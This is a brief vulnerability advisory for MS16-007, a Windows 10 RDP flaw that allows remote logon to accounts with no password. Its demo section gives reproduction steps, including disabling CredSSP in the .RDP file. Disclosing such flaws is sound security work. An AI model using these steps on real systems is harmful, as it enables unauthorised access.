Timeline :
Vulnerability discovered and reported to the vendor by Gal Goldshtein and Viktor Minin of Citadel
Patched by the vendor through MS16-007 the 2016-01-12
Details of the vulnerability provided by Michael Schierl @mihi42 the 2016-01-12
PoC provided by :
Michael Schierl
Reference(s) :
Affected version(s) :
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 version 1511 for 32-bit Systems
Windows 10 version 1511 for x64-based Systems
Tested on :
Windows 10 for x64-based Systems with Microsoft Remote Desktop for Mac version 8.0.26
Description :
A security feature bypass vulnerability exists in Windows Remote Desktop Protocol (RDP) that is caused when Windows 10 hosts running RDP services fail to prevent remote logon to accounts that have no passwords set.
Demo :
- On the target Windows 10 Create a local user without password Grant the created user RDP - On the client Add "enablecredsspsupport:i:0" in the ".RDP" file Connect to the target with the username and without password